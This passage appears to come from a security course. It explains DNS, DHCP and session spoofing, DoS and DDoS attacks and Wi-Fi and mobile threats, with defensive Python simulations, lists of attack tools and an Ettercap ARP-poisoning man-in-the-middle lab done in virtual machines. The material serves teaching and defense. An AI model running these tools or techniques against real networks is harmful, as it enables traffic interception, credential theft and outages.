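        seen.add((rng.randrange(TXID_SPACE), port))
    return [{"qname": qname, "txid": t, "port": p,
             "answer": "ns1.google.com A 203.0.113.66"} for t, p in seen]


def simulate(queries, guesses, randomize_port, seed=7):
    """Count how many of `queries` lookups get poisoned when the attacker
    sends `guesses` forged replies per lookup (assumes the forged replies all
    arrive before the legitimate one)."""
    rng = random.Random(seed)
    poisoned = 0
    for i in range(queries):
        q = make_query(rng, f"random-domain-{i}.google.com", randomize_port)
        batch = forged_batch(rng, q["qname"], guesses, randomize_port)
        if any(response_accepted(q, r) for r in batch):
            poisoned += 1
    return poisoned


def expected_per_query(guesses, randomize_port):
    """Analytic chance that one lookup is poisoned, for comparison."""
    ports = (EPHEMERAL[1] - EPHEMERAL[0] + 1) if randomize_port else 1
    return guesses / (TXID_SPACE * ports)


if __name__ == "__main__":
    for rp in (False, True):
        hits = simulate(queries=1500, guesses=400, randomize_port=rp)
        print(f"port randomization={rp}: {hits}/1500 lookups poisoned "
              f"(analytic {expected_per_query(400, rp):.2e} per lookup)")
```

With a fixed source port the attacker needs to cover only 65,536 transaction IDs, and a few hundred forged replies per query succeed after a few hundred queries; randomizing the source port multiplies the space by the size of the ephemeral range and pushes the same attack into the billions of guesses, which is the fix that was rolled out to resolvers after the 2008 Kaminsky disclosure.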

DNS Hijacking
In a DNS hijacking attack, an attacker modifies a computer's DNS configuration to point it
toward a rogue name server controlled by the attacker. Attackers can modify an end user's TCP/IP
configuration through malware, which switches the DNS server setting from automatic (using their
ISP's servers) to manual (the attacker's server). The attacker can then serve up more malware to the
user, such as adware and spyware, and redirect the user to look-alike sites (pharming) to steal the
user's credentials.

DHCP Spoofing

DHCP spoofing occurs when a host computer sends requests to a Dynamic Host Configuration
Protocol (DHCP) server to be assigned an IP address. The attacker, using a rogue DHCP server,
responds to this request before the actual DHCP server can. In this spoofed response, the attacker
usually claims that the default gateway's IP address (and often the DNS server's address) is their
own. This way, any messages the host sends to other networks will travel to the attacker in a
man-in-the-middle attack.
To beat the legitimate DHCP server's response, the attacker can position themselves along a closer
path to their target. They can also initiate a DoS against the DHCP server at the right time to delay
or halt its response.
Networks can defend against DHCP spoofing by enabling DHCP snooping at the network switch;
this feature marks only the ports that lead to the legitimate DHCP server as trusted, whereas all
others are untrusted. An untrusted switch port can only send DHCP client requests, and any DHCP
server responses (offers and acknowledgments) that arrive on it are dropped.




Figure 4-14: An attacker spoofing a DHCP response.

Session Hijacking

Over a network like the Internet, session hijacking involves stealing an active session cookie that is
used to authenticate a user to a remote server, and then using that to control the session thereafter.
In a session fixation attack, the attacker obtains a valid session ID in advance and sends it to a
target, for example inside a link. If the target logs in using that session ID (usually under false
pretenses) and the application does not issue a new ID at login, the attacker now holds an
authenticated session. Attackers can also sniff network traffic to obtain session cookies sent over an
unsecured network, like a public Wi-Fi hotspot. Session cookies can also be hijacked through
cross-site scripting (XSS) attacks. In this technique, the attacker injects malicious code into a
website, which can then execute on the client's browser and read the victim's session cookie unless
the cookie was set with the HttpOnly attribute.

Example CVE IDs: CVE-2016-2076, CVE-2015-5346, and CVE-2015-8124.

Session hijacking attacks may be used to execute DoS to either the client's system or the server
system, or in some cases, both systems. Attackers may also hijack sessions to access sensitive
information, like bank accounts or private communications.

Note: Another type of session hijacking involves predicting the sequence number in TCP packet
transmissions. However, this type of attack is less common.
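Two server-side controls against the cookie theft and session fixation described above, as an added example (not course code and not any web framework's API). The first audits a Set-Cookie header for the attributes that keep a session cookie out of reach of injected script, plain-HTTP sniffing and cross-site requests; the second is a minimal in-memory session store that rotates the session ID at login so an ID the attacker planted never becomes the authenticated one. The cookie values and user names are constructed.

```python
"""Two controls against cookie theft and session fixation: an audit of
Set-Cookie attributes, and a session store that rotates the ID at login.

ADDED EXAMPLE, not course code or any framework's API. Cookie values and
user names are constructed; the store is in-memory for illustration.
"""
import secrets
from http.cookies import SimpleCookie


def audit_set_cookie(header_value: str) -> list:
    """Return the weaknesses in one Set-Cookie header value. An empty list
    means the cookie cannot be read by injected script (HttpOnly), cannot be
    sent over plain HTTP (Secure) and is not attached to cross-site requests
    by default (SameSite)."""
    jar = SimpleCookie()
    jar.load(header_value)
    findings = []
    for name, morsel in jar.items():
        if not morsel["httponly"]:
            findings.append(f"{name}: no HttpOnly; document.cookie exposes it to XSS")
        if not morsel["secure"]:
            findings.append(f"{name}: no Secure; sniffable on an open Wi-Fi hotspot")
        if not morsel["samesite"]:
            findings.append(f"{name}: no SameSite; sent on cross-site requests")
    return findings


def hardened_set_cookie(name: str, value: str) -> str:
    """Build a Set-Cookie value that passes audit_set_cookie()."""
    return f"{name}={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


class SessionStore:
    """Minimal server-side session table (in-memory, for illustration)."""

    def __init__(self):
        self._sessions = {}

    def start(self) -> str:
        """Issue an anonymous session, e.g. on first visit. An attacker can
        obtain one of these and plant it on the victim (fixation)."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, presented_sid: str, user: str) -> str:
        """Authenticate and ROTATE: the pre-login ID is discarded and a new
        one issued, so an ID the attacker planted never becomes the
        authenticated session."""
        self._sessions.pop(presented_sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {"user": user}
        return new_sid

    def user_for(self, sid: str):
        entry = self._sessions.get(sid)
        return entry["user"] if entry else None


def fixation_demo() -> tuple:
    """Attacker plants `planted`; victim logs in with it. Returns what the
    planted ID and the victim's new ID resolve to afterwards."""
    store = SessionStore()
    planted = store.start()                      # attacker obtains a valid ID
    victims_sid = store.login(planted, "alice")  # victim logs in with it
    return store.user_for(planted), store.user_for(victims_sid)


if __name__ == "__main__":
    print(audit_set_cookie("session=3f9a; Path=/"))
    print(audit_set_cookie(hardened_set_cookie("session", "3f9a")))
    print(fixation_demo())   # (None, 'alice'): the planted ID is dead
```

The audit function is the kind of check you can run over a proxy capture of an application's login response; HttpOnly addresses the XSS route described above, Secure addresses the open-hotspot route, and rotation at login addresses fixation. Sniffing of a cookie that is already being sent in the clear is only fixed by moving the whole application to HTTPS.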

Hijacking and Spoofing Tools



The following are examples of popular tools attackers may use to hijack sessions or impersonate
users and computers.

Spoofing tools
• hping
• Nmap®
• Cain & Abel
• Ettercap
• Nemesis
Session hijacking tools
• CookieCatcher
• DroidSheep
• CookieMonster




ACTIVITY 4-4
Assessing the Impact of Hijacking and
Impersonation Attacks

Before You Begin

You'll be using Ettercap, a network security tool, to launch an ARP poisoning attack from Kali
Linux. You'll also be working with your Windows 10 client.

Scenario
You have been getting numerous complaints from people connected to Develetech's guest wireless
network today complaining of timeouts and slow service. You connect your analysis laptop to the
network and find that the performance is unusually bad. You'll investigate further by viewing your
ARP cache and monitoring Wireshark for any unusual traffic.

1. Display your client's ARP cache.
a) On your Windows 10 client, open a Windows PowerShell administrator prompt and enter arp -a

b) Verify that the ARP cache lists other hosts (by IP address) in the local network.
c) If your Kali Linux host is not listed, ping it, then reenter arp -a

d) View the MAC address associated with each IP address. Notice each IP address has a different
MAC address, as expected.
e) Take note of your Kali Linux VM's MAC address.

2. Simulate a man-in-the-middle ARP poisoning attack.


a) Switch to your Kali Linux VM.

b) Open a terminal and enter sudo ettercap -G to open Ettercap in GUI mode.




c) In the ettercap 0.8.3.1 window, from the menu, select Options→Set Netmask.

d) In the ettercap Input dialog box, in the Netmask field, type 255.255.255.0 and select OK.
e) Verify the sniffing settings are as follows:


f) Select Accept.

g) From the menu, select Options→Hosts→Scan for hosts.


h) When Ettercap finishes scanning for hosts, select Options→Hosts→Hosts list.
i) Verify that your router and hosts appear in the list, including your own client and server.

j) Select your Windows 10 client from the host list, and then select Add to Target 1.
k) Select your Windows Server 2019 server from the host list, and then select Add to Target 2.
This selects the targets that your attack will step in the middle of as traffic is sent from one to the
other.




l) From the menu, select MITM menu→ARP poisoning.

m) In the MITM Attack: ARP Poisoning dialog box, verify that the Sniff remote connections check box is
checked and select OK.


n) In the bottom pane, verify that Ettercap is currently sniffing for traffic between these hosts.

3. Communicate between client and server and view your ARP cache again.
a) Switch back to your Windows 10 client and return to a Windows PowerShell prompt.

b) At the prompt, ping your server.



c) At the prompt, enter arp -a to view your ARP cache.




d) Verify that the IP address entries for your server and the Kali Linux machine are pointing to the
same exact MAC address.

4. Confirm the spoofing attack in Wireshark.

a) In your Kali Linux VM, open another terminal and enter wireshark
b) Once Wireshark opens, double-click the eth0 interface to begin capturing packets.
c) In the Apply a display filter text box, enter arp to filter by ARP packets.
d) Switch to your Windows 10 client and ping both your server and your Kali Linux VM.
e) Return to Wireshark in Kali Linux and stop the capture.
f) Verify that ARP is telling your client that the one MAC address for your Kali Linux VM is associated
with both your Kali Linux IP address and your Windows Server IP address.

Note: Wireshark on the Windows 10 host may not be able to capture packets that go from the
host to the VM and vice versa. That is why the capture is taken in the Kali Linux VM.

Note: Remember that you can use the middle pane to learn more information about a packet. For
example, you can confirm the source and destination IP address of each packet.



5. What is the value to an attacker in doing this?


A: The attacker could use the corrupted ARP caches to set up a man-in-the-middle attack where they
capture traffic between each of the workstations and the router (and maybe alter that traffic, if it is
unencrypted). They could also use this attack to create a DoS condition.




6. How would you defend against this type of attack?


A: Answers will vary, as there are several mitigation techniques available. A concrete but difficult to
manage technique is to write the ARP tables manually and keep them static. For example, you
can add only workstations that use a particular file server to the table. Subnetting can also reduce
the effectiveness of ARP poisoning, as such an attack won't be routed to different subnets. An IDS
can also alert security personnel to suspicious ARP traffic, if configured properly. Port security,
DHCP snooping, and dynamic ARP inspection can work together to effectively identify and block
invalid MAC address entries.

7. Clean up the Kali Linux workspace.
a) Close Wireshark without saving.

b) In Ettercap, select Stop MITM.

c) Close Ettercap.





TOPIC E
Assess the Impact of DoS Incidents
Throughout this lesson, you've seen how different types of attacks can lead to a denial of service. In
this topic, you'll dive deeper into the nature of DoS attacks and how attackers initiate them.

Denial of Service (DoS) Attack

A denial of service (DoS) attack is a type of attack in which an attacker attempts to disrupt or
disable systems that provide network or application services by various means, including:
• Flooding a network link with data to consume all available bandwidth.
• Sending data designed to exploit known flaws in an application.
• Sending multiple service requests to consume a system's resources.
• Flooding a user's email inbox with spam messages, causing the genuine messages to get bounced
back to the sender.

Example CVE IDs: CVE-2016-5126 and CVE-2016-4454.

D
Figure 4-15: A DoS attack in which excess data floods a server, rendering it inoperable.
at

DoS Attack Techniques
The following table describes some of the different types of DoS attacks.

Instructor note: You may also wish to mention SYN floods. This type of DoS attack is not as relevant as it used to be, however.

DoS Attack Type | Description

ICMP flood: This attack is based on sending high volumes of Internet Control Message Protocol (ICMP) ping packets to a target. Common names for ICMP flood attacks are Smurf attacks and ping floods. Modern systems and networks are usually well protected against these types of attacks.

UDP flood: In this attack, the attacker attempts to overwhelm the target system with User Datagram Protocol (UDP) ping requests. Often, the source IP address is spoofed, creating a DoS condition for the spoofed IP.

Buffer overflow: Many systems and services are vulnerable to a buffer overflow condition, in which too much data is fed into a fixed-length memory buffer, resulting in adjacent areas of memory being overwritten. Attackers can exploit buffer overflow vulnerabilities by deliberately invoking buffer overflow conditions, introducing bad data into memory, thus opening the door for any number of subsequent attack methods or simply causing the system to cease to function or respond. A buffer overflow can also occur when there is an excessive amount of incomplete fragmented traffic on a network. In this case, an attacker may attempt to pass through security systems or IDSs.


Reflected DoS attack: In reflected DoS attacks, a forged source IP address (the target) is used when sending requests to a large number of computers. This causes those systems to send a reply to the target system, causing a DoS condition. One example of a reflected attack is a Network Time Protocol (NTP) reflected attack. NTP helps hosts on a network keep their clocks synchronized, and an attacker can send a small query to an NTP server that returns a much larger response that includes data from the last 600 machines the server has communicated with. The size disparity between the query and the response makes it easier for an attacker to flood their target with traffic, because the bandwidth they expend is much less than the bandwidth that results.
A similar technique is used in a DNS amplification attack, in which a small query to a DNS server returns a reply up to eight times larger. Reflection attacks can also target the Memcached service, which caches data in memory to reduce the amount of calls to databases and other sources of data. Poorly configured Memcached servers are exposed to the Internet and support UDP traffic, which does not require authentication. The amplification factor of such traffic is greater than 50,000.

Resource exhaustion: Resource exhaustion is a type of DoS vulnerability that occurs when an application does not properly restrict access to requested or needed resources. If an attacker is able to consume enough of an important resource, such as network bandwidth or CPU time, the application will no longer be able to perform its normal operations and may crash.

Permanent DoS attack: Permanent DoS attacks, also called phlashing, target the actual hardware of a system to cause a service outage the victim can't easily recover from. With a successful attack, phlashing forces the victim to repair or replace the hardware that runs the system. Taking advantage of remote administration, the attacker may be able to push corrupted firmware onto the hardware, causing that equipment to "brick," or become completely inoperable.

Packet Generators
The previous network packet–based attack techniques are typically amplified by tools called packet generators. Packet generators enable the attacker to craft custom network packets to carry out specific DoS attacks or target specific services. This automates the process of sending large amounts of malicious or malformed packets.

Botnets and DDoS
A botnet is a set of computers that has been infected by a control program (called a controller) that enables attackers to collectively exploit those computers to mount attacks. Typically, attackers use botnets to coordinate DoS attacks, send spam email, extract personal information or passwords, and mine for cryptocurrency. Users of these infected machines (called bots, zombies, or drones) are often unaware their computers are being used for nefarious purposes.

Instructor note: Example CAPEC ID: CAPEC-125.

DoS operations that use botnets are typically classified as distributed denial of service (DDoS) attacks. A DDoS is a type of DoS attack that uses multiple computers on disparate networks to launch the attack from many simultaneous sources. DDoS attacks are often much more devastating to systems than typical DoS attacks, as even the largest and most well-defended networks can be overwhelmed by the sheer volume and distribution of malicious traffic.


Figure 4-16: A DDoS attack in which zombie computers in a botnet flood a server with data, rendering it inoperable.

Mitigation
Mitigating DDoS attacks can be difficult without a great deal of bandwidth and network redundancies. Even the largest and most well-equipped organizations cannot fully stop such attacks. However, there are some tactics that can help lessen the impact of a DDoS attack:
• Contact your ISP to see if they offer DDoS protection services. These services are also offered by organizations that specialize in DDoS defense, the most popular of which is Cloudflare.
• Implement network perimeter defenses such as timing out half-open connections and lowering the threshold at which the network drops traffic on certain protocols like ICMP. These tactics will only slow the attack, not stop it completely.
• Have a backup plan in place in case critical services go down.

How Attackers Evade DDoS Countermeasures
DDoS attacks are incredibly difficult to prevent, especially when botnets are involved. Hackers have become so successful at turning random Internet-connected devices into zombie computers that compiling and maintaining a botnet has become a serious operation. In fact, many such operations offer the services of their botnet to anyone willing to pay. In many cases, these prices are modest, making them much more accessible. Someone with a grievance and a target can rent the botnet without even needing any technical knowledge.
While load balancers and IP address filters offer rudimentary protection against a DDoS attack, the large and distributed nature of a botnet can easily overwhelm a hardened system. Even organizations with massive resources are susceptible to a service outage caused by a botnet, because it's incredibly difficult to separate legitimate traffic from the malicious traffic.
Likewise, attackers can evade DDoS defenses by generating traffic in a completely legitimate and organic manner, without even needing a botnet. Popular social media sites like Reddit and Twitter have caused many websites to crash when someone submits a link to that site. This is called the Slashdot effect or slashdotting, named after a social news site popular in the mid-2000s. Thousands—and even millions—of users all flock to the website at once, which the servers can't handle. In most cases, the person who submitted the link had no malicious intent, but a clever attacker can use this as a cover for initiating a DDoS condition.

DoS Tools
The following are examples of popular tools attackers may use to initiate DoS or DDoS attacks:
• High Orbit Ion Cannon (HOIC)
• Low Orbit Ion Cannon (LOIC)
• XOIC
• OWASP HTTP Post Tool
• DDOSIM
• R-U-Dead-Yet (RUDY)
• Slowloris
• PyLoris
• Tor's Hammer
• HTTP Unbearable Load King (HULK)

Note: For more information about DoS controls, visit https://www.cisco.com/c/en/us/about/security-center/guide-ddos-defense.html.


ACTIVITY 4-5
Assessing the Impact of DDoS Incidents

Data File
C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments\DDOS_Attack.pcap

Before You Begin
You'll use your Windows 10 client in this activity.

Scenario
You get a frantic call from the Develetech web administrator telling you the site has been down more than an hour, although the server itself is up and seems to be working. You see the flashing of the switch lights and realize your server is receiving massive amounts of traffic. You plug your analysis laptop into the switch and capture the traffic hitting the web server at 209.73.12.194. You want to see if there is a pattern of DDoS activity currently hitting the web, so you'll do some research to that effect. Detecting or not detecting a pattern could indicate the severity of the attack on your systems.

1. Examine the DDOS_Attack.pcap file containing your captured traffic of the attack on your server.
a) On your Windows 10 client, open Wireshark.
b) In Wireshark, open DDOS_Attack.pcap from the course data files.
c) Select Statistics→Conversations.
d) Select the IPv4 tab.



e) Note the wide variety of IP addresses and the number of packets coming from each.

Instructor note: This is not an actual DDoS attack but a simulation of one with random addresses, so it is not completely realistic. More advanced students may realize this.

2. Is there any pattern to the attacking IP addresses?
A: No, they seem to be completely random, though there are some with numbers close together.

3. Select the TCP tab. What port number are the attackers targeting?
A: Port 80 (HTTP), to take down a web server.

4. Close Wireshark.
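The pattern you read off the Conversations view in steps 1 through 3 (many unrelated sources, nearly all aimed at TCP port 80) can also be checked programmatically. The following Python script is an added example, not part of the course or its data files: it builds a constructed conversation list in place of DDOS_Attack.pcap (only the server address 209.73.12.194 comes from the scenario), and it goes one step beyond the activity by also flagging the reflection pattern described earlier in this topic, where UDP replies arrive from NTP, DNS or Memcached service ports that the server never queried.

```python
"""Flow-level DoS pattern check, modelled on what Activity 4-5 has you read off
Wireshark's Statistics > Conversations view (IPv4 and TCP tabs)."""
from collections import Counter, defaultdict
from dataclasses import dataclass

# UDP services the topic names as reflection sources, keyed by their service port
REFLECTOR_PORTS = {123: "NTP", 53: "DNS", 11211: "Memcached"}
TARGET = "209.73.12.194"  # Develetech web server address from the activity scenario


@dataclass(frozen=True)
class Flow:
    """One conversation row: who talked to whom, over what, and how much."""
    src_ip: str
    dst_ip: str
    proto: str      # "TCP" or "UDP"
    src_port: int
    dst_port: int
    packets: int
    bytes: int


def build_sample_flows() -> list:
    """Constructed stand-in for the DDOS_Attack.pcap conversation list.

    Addresses and counts are deterministic so the result is reproducible; they
    are not taken from the course data file.
    """
    flows = []
    # 80 distinct, unrelated sources each sending a handful of packets to TCP/80
    for i in range(80):
        src = f"10.{i // 16}.{i % 16}.{(i * 37) % 251 + 1}"
        flows.append(Flow(src, TARGET, "TCP", 1024 + i, 80, 3 + i % 5, 400))
    # One ordinary HTTPS client session
    flows.append(Flow("198.51.100.7", TARGET, "TCP", 51000, 443, 40, 20000))
    # A DNS query the server made itself, and the matching reply
    flows.append(Flow(TARGET, "198.51.100.53", "UDP", 40000, 53, 1, 60))
    flows.append(Flow("198.51.100.53", TARGET, "UDP", 53, 40000, 1, 120))
    # NTP "replies" from three servers the target never queried: reflection traffic
    for i in range(3):
        flows.append(Flow(f"203.0.113.{i + 1}", TARGET, "UDP", 123, 80, 30, 12000))
    return flows


def assess(flows, target, min_sources=50):
    """Summarise inbound traffic to `target` the way an analyst would from the
    Conversations view, and flag the two DoS patterns the topic describes."""
    inbound = [f for f in flows if f.dst_ip == target]

    # Volumetric pattern: many unrelated sources concentrated on one port
    packets_by_port = Counter()
    sources_by_port = defaultdict(set)
    for f in inbound:
        packets_by_port[(f.proto, f.dst_port)] += f.packets
        sources_by_port[(f.proto, f.dst_port)].add(f.src_ip)
    total = sum(packets_by_port.values())
    top_port, top_packets = packets_by_port.most_common(1)[0] if total else (None, 0)
    top_sources = len(sources_by_port[top_port]) if top_port else 0

    # Reflection pattern: UDP from a reflector service port that the target never
    # queried (a legitimate reply always matches an earlier outbound request)
    queried = {(f.dst_ip, f.dst_port) for f in flows
               if f.src_ip == target and f.proto == "UDP"}
    reflected_bytes = Counter()
    for f in inbound:
        if (f.proto == "UDP" and f.src_port in REFLECTOR_PORTS
                and (f.src_ip, f.src_port) not in queried):
            reflected_bytes[REFLECTOR_PORTS[f.src_port]] += f.bytes

    return {
        "unique_sources": len({f.src_ip for f in inbound}),
        "top_port": top_port,
        "top_port_share": top_packets / total if total else 0.0,
        "top_port_sources": top_sources,
        "volumetric_flood": top_sources >= min_sources,
        "reflection_bytes": dict(reflected_bytes),
        "reflection_suspected": bool(reflected_bytes),
    }


if __name__ == "__main__":
    report = assess(build_sample_flows(), TARGET)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Real captures are not this tidy: a legitimate traffic spike (the Slashdot effect discussed later in this topic) also shows many unique sources on port 80, so the source count is a prompt for investigation rather than proof of an attack.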

5. Investigate DDoS attacks currently underway.
a) In your web browser, navigate to www.digitalattackmap.com.

Instructor note: Some other sites you may want to demonstrate are https://isitdownrightnow.com and http://downrightnow.com.


b) Hover over the various attacks to display statistics about them.
c) Scroll down the page to see more resources concerning DDoS attacks.
d) Navigate to www.downinspector.com.
e) In the URL text box, enter a website such as twitter.com or facebook.com
f) Now check google.com and amazon.com
g) If the site is down, note the statistics on how often and how long it has been down. If the site is up, note any recent outages in the past.

6. Why do you think some sites go down less than others?
A: Answers may vary, but larger Internet companies like Google and Amazon have massive Internet connection bandwidth and lots of redundancy so they can absorb a DDoS attack and still stay online. Others either cannot afford to or do not choose to spend the money to do that.

7. How can you defend an organization against DDoS attacks?
A: Answers may vary, but it is very difficult without simply buying lots of extra bandwidth and/or redundant Internet connections. You may be able to consult with your ISP if it offers some sort of DDoS protection services. You can also attempt to delay, but not fully stop, an attack by incorporating network perimeter defenses like timing out half-open connections and lowering the thresholds at which to drop certain traffic like ICMP. Ultimately, it's important to have a plan in place in case you need to escalate your mitigation efforts to a specialist or other third party.

TOPIC F
Assess the Impact of Threats to Mobile Security
In this topic, you'll take a look at how attackers target mobile devices and what sort of impact this can have on the organization.

Trends in Mobile Security
In many ways, mobile devices are beginning to replace traditional desktop platforms as the way in which employees work. This is especially true of disciplines that require constant communication, as well as ones that involve the quick viewing of data and information. As user habits change, so too must the organization's infrastructure. One direct consequence of the increase in mobile device usage is the increased need for wireless infrastructure.
Similarly, bring your own device (BYOD) is a phenomenon in the office workplace, and one of the most significant trends in the world of mobile computing. Since mobile devices are now so integral to everyday life, it is inevitable that employees will bring their own to supplement the devices provided to them by their employers. Unsurprisingly, this practice introduces a whole host of security issues and legal concerns into a corporate environment. Since an employee's personal property is out of the employer's control, it is difficult to account for every risk, threat, and vulnerability involved with these devices. Some companies have elected to outright ban BYOD to prevent such security incidents; however, for a number of reasons, this isn't always feasible.
Note: Some organizations attempt to circumvent or at least offer an alternative to BYOD by provisioning employees with phones that the organization has ultimate ownership over.
e
Wireless Threats
There are various threats to the organization's wireless network that attackers can exploit. One of the most direct is attempting to crack a private wireless signal. These attacks are launched in much the same way as a typical online password attack: trying to brute force or run down a wordlist in multiple attempts to log in to the network. Networks that don't implement lockout after a number of failed attempts are particularly vulnerable, not to mention those that use weak passwords or outdated encryption.

Instructor note: Example CVE IDs: CVE-2017-13077, CVE-2017-13078, CVE-2017-13079, and CVE-2017-13080.

Even routers that implement WPA2 can be vulnerable. In 2017, security researchers revealed a key reinstallation vulnerability in the WPA2 standard—called KRACK—that enables attackers to decrypt TCP packets and inject malicious code into unencrypted HTTP requests. This is possible because of the way that the four-way handshake in WPA2 negotiation works. In the third step of the handshake, the access point sends the shared encryption key to the client, which installs it. To address the possibility of dropped connections, the WPA2 protocol is designed to resend this key in case the client does not respond. Every time the key is resent, the client reinstalls the key, and the incremental transmit packet number (the nonce) is reset. An attacker who forces this reset can launch a replay attack on messages that have already been encrypted using this same nonce value. The attacker can therefore derive the keystream from messages with known contents that use this nonce value. Because this is a weakness in the standard itself, all unpatched implementations are vulnerable.
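To see why the nonce reset matters, and what a patched client does differently, the following Python model is an added example, not code from the course, the Wi-Fi standard or any real driver: a toy SHA-256 stream cipher stands in for the real encryption, a hypothetical Station class models the client receiving message 3, and the key and frame contents are constructed. The keystream recovery at the end is the known-plaintext step the paragraph above describes; with the fix applied, the retransmitted message 3 no longer resets the nonce and the step yields nothing.

```python
"""Toy model of the WPA2 message-3 handling described above: resetting the
transmit nonce on key reinstallation lets a frame with known contents reveal the
keystream, and refusing to reinstall an already-installed key prevents it.
Cipher, key and frames are constructed for the example, not real CCMP traffic."""
import hashlib


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings; the result is as long as the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def keystream(key: bytes, nonce: int, length: int) -> bytes:
    """Toy stream cipher: the keystream depends only on key and nonce, which is
    exactly why the same nonce must never be used twice under one key."""
    out = b""
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce.to_bytes(8, "big")
                              + block.to_bytes(4, "big")).digest()
        block += 1
    return out[:length]


class Station:
    """Hypothetical Wi-Fi client. With patched=False every message 3 installs
    the key and resets the nonce, as the text describes. With patched=True a
    retransmitted message 3 carrying the already-installed key is acknowledged
    but not reinstalled, so the nonce keeps counting upward."""

    def __init__(self, patched: bool):
        self.patched = patched
        self.key = None
        self.nonce = 0

    def receive_message3(self, key: bytes) -> bool:
        """Install the key; returns True if a (re)installation happened."""
        if self.patched and self.key == key:
            return False
        self.key = key
        self.nonce = 0      # transmit packet number starts over
        return True

    def send(self, plaintext: bytes):
        """Encrypt one frame under the current key and the next nonce value."""
        self.nonce += 1
        ks = keystream(self.key, self.nonce, len(plaintext))
        return self.nonce, xor_bytes(plaintext, ks)


def keystream_from_known_frame(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext step from the text: ciphertext XOR plaintext is the
    keystream for that key and nonce."""
    return xor_bytes(ciphertext, known_plaintext)


def simulate(patched: bool) -> dict:
    """Message 3, one predictable frame, retransmitted message 3, one sensitive
    frame. Report whether the nonce repeated and whether the sensitive frame
    could be read using only the predictable one."""
    ptk = hashlib.sha256(b"constructed example key").digest()[:16]  # stand-in PTK
    sta = Station(patched)
    sta.receive_message3(ptk)
    predictable = b"GET / HTTP/1.1\r\n"   # frame whose content is easy to guess
    nonce1, ct1 = sta.send(predictable)
    sta.receive_message3(ptk)             # message 3 resent, e.g. message 4 was lost
    sensitive = b"token=s3cr3t-val"       # same length as the predictable frame
    nonce2, ct2 = sta.send(sensitive)
    recovered = xor_bytes(ct2, keystream_from_known_frame(ct1, predictable))
    return {"nonce_reused": nonce1 == nonce2,
            "sensitive_frame_exposed": recovered == sensitive}


if __name__ == "__main__":
    print("unpatched:", simulate(patched=False))  # nonce reused, frame exposed
    print("patched:  ", simulate(patched=True))   # nonce advances, frame hidden
```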
As mentioned before, the organization's wireless infrastructure is also at risk if it doesn't adapt. Attackers are eager to shut down wireless networks that can't handle a certain amount of traffic load because of poor logical and physical configurations. Likewise, a wireless network that leaks its signal into areas outside the organization's premises is ripe for war driving attacks. Attackers will attempt to identify weak points in the wireless network during their reconnaissance phase; when it comes time to attack, they'll be able to focus their efforts on the most vulnerable points in the infrastructure, increasing their effectiveness.
Attackers also frequently target wireless network clients, as they are so numerous and difficult for security professionals to completely control. Anyone with access to the encryption key can connect to the network automatically, and if an attacker is able to physically compromise the device, they can use it as a vector for a much more wide-reaching assault on the network.

FragAttacks
Another example of threats that exploit vulnerabilities in the design of Wi-Fi are FragAttacks. Information on these attacks was published in 2021. FragAttacks take advantage of one of three flaws:
• A flaw in the aggregation flag of a Wi-Fi frame that enables an attacker to modify this flag data with malicious data. This is called an aggregation attack.
• A flaw in the frame fragmentation feature that enables an attacker to reassemble frame fragments that were decrypted using different keys. This is called a mixed key attack.
• Another flaw in the frame fragmentation feature that enables an attacker to inject a malicious fragment into an access point's memory cache, so that when a user connects to the network and transmits fragmented frames, those fragments are reassembled along with the malicious fragment. This is called a fragment cache attack.
D
Threats in BYOD Environments
The following table lists various threats introduced in a BYOD environment.

Threat | Description

De-perimeterization: With BYOD, work done while in the office may leave the office after close of business. This pushes the boundaries farther than the organization can totally manage. Employees who take sensitive data outside of the perimeter and fail to secure their devices will risk that data falling into the wrong hands. Likewise, for remote employees, the concern shifts toward securing the interface that those employees use to access the network.

Unpatched and insecure devices: The mobile devices employees use may be difficult to patch or be running outdated software, which could leave them more vulnerable to attack. Many mobile devices also lack built-in anti-malware software. Not only can malware infect that user's device, but it could likewise spread throughout the network when the device connects.

Strained infrastructure: The addition of multiple devices may place a strain on the network and cause it to stop functioning at optimum capacity. This may also lead to a DoS, whether intentional or not.

Forensic complications: Because employees own their devices, subjecting them to forensic procedures in response to an incident may prove difficult or even impossible. This can compromise the integrity of forensic investigations.

Lost or stolen devices: Unencrypted data on a phone or tablet is at risk of compromise if that phone or tablet is lost or stolen.

Threats to Specific Mobile Platforms
Different mobile operating systems present different approaches to security. The following table outlines significant threats that target both the major mobile operating systems.

Instructor note: Example CVE IDs: CVE-2016-4782, CVE-2016-2462, CVE-2016-3664, and CVE-2016-1859.


Mobile Operating System | Threats

Android™: The vast majority of malware targeted at mobile platforms targets Android. This is due to a number of factors, including:
• Having the largest market share.
• Users running older versions of Android with unpatched vulnerabilities.
• The open, customizable nature of the operating system.
• Usage of third-party apps.
• Rooting of devices, enabling apps to obtain high-level privileges and hijack the OS and other apps.
Commonly, malware operates on Android devices by forcing the user's device to initiate premium service text messaging or phone calls. The user is unaware of this, and is charged fees based on this malicious activity.
The predominant source of these threats is from unofficial application stores rather than the official Google Play store. However, some malware still makes it to Google Play, like the Judy app variants that infected millions of devices with a browser hijack used to click on advertisements.

iOS®: iOS is not impervious to compromise. Malware, in particular, targets jailbroken devices that remove restrictions, particularly the restriction of only being able to download apps from the official App Store.
For example, the Masque attack infected devices that installed the malicious app through a third-party source, and the Masque app spoofed a legitimate app's bundle identifier. This enabled the malicious app to replace the legitimate one, appearing to be genuine while actually stealing the user's credentials or gaining root access to the device.


Mobile Infrastructure Hacking Tools
The following are examples of popular tools attackers may use to hack into mobile platforms:
• AnDOSid
• Spooftooph
• DroidBox
• APKInspector
• AndroRAT
• Burp Suite


ACTIVITY 4-6
Assessing the Impact of Threats to Mobile Devices

Before You Begin
You'll use your Windows 10 client in this activity.

Scenario
Develetech employees use their own personal mobile devices for work in addition to their main company-issued laptops. Management has asked you to determine the security implications of this BYOD approach and whether the choice of devices should be restricted. You'll do some research on the state of mobile device threats for Android and iOS, the two most popular mobile operating systems. This will help determine what is appropriate in your organization based on your security needs.

1. Investigate security threats to Apple's and Google's mobile platforms.
a) In your web browser, navigate to www.cvedetails.com.
